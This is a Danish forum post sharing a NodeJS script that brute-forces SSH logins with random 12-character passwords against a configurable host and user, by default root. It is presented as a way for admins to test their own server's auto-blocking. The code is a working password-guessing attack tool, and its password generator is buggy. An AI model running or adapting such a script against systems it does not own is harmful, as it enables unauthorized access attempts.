Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Simpel Bruteforce test
28-03-2015, 02:11 (Denne besked var sidst ændret: 28-03-2015, 02:11 af Rubas.)
#1
Simpel Bruteforce test
Brug denne simpel test til at se om din server tager forhold til bruteforcing.
Scriptet kræver NodeJS, og bibliotek: simple-ssh og randomstring, som kan installeres via npm install simple-ssh og npm install randomstring

Kode:
/*
Use this test for seeing the important logs of bruteforce attacks in /var/log/auth.log .
Please use this on own risk!! If your linux box got the security, you might get banned from your own linux box.

Use this as a tester for auto-blocking robots that are trying to bruteforcing into your SSH.

libraries used: simple-ssh and randomstring.
*/

var SSH = require('simple-ssh');
var randomstring = require("randomstring");

var triedOut = [];
var theRandomVariable;

var arrayContains = function(pRandomString){
    var i = triedOut.length;
    while (i--) {
       if (triedOut[i] === pRandomString) {
           return true;
       }
    }
    return false;
}

var getRandomPassword = function(){
    theRandomVariable = randomstring.generate(12);
    if(arrayContains(theRandomVariable)){
        console.log("Exists in array " + theRandomVariable);
        getRandomPassword();
    } else {
        return randomstring.generate(12);
    }
}

var startSSH = function(){
    var aRandomPassword = getRandomPassword();
    var ssh = new SSH({
        host: '<< HOST IP >>',
        port: '<< HOST PORT / DEFAULT 22 >>',
        user: '<< HOST USER / DEFAULT ROOT >>',
        pass: aRandomPassword,
    });

    ssh.exec("ls", {
         out: function(stdout) {
            console.log(stdout);
            console.log("Got in! Used password: " + aRandomPassword);
        }
    }).start();

    ssh.on('error', function(err) {
        console.log('Did not get in.');
        console.log('Tried out: ' + aRandomPassword);
        console.log(err);

        if(aRandomPassword !== undefined){
            triedOut.push(aRandomPassword);
        }

        ssh.end();
        startSSH();

        console.log(triedOut.length);
    });
}

startSSH();

Hvis du har nogen forslag, ændringer eller bare +1 postcount, så skriv løs :)
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)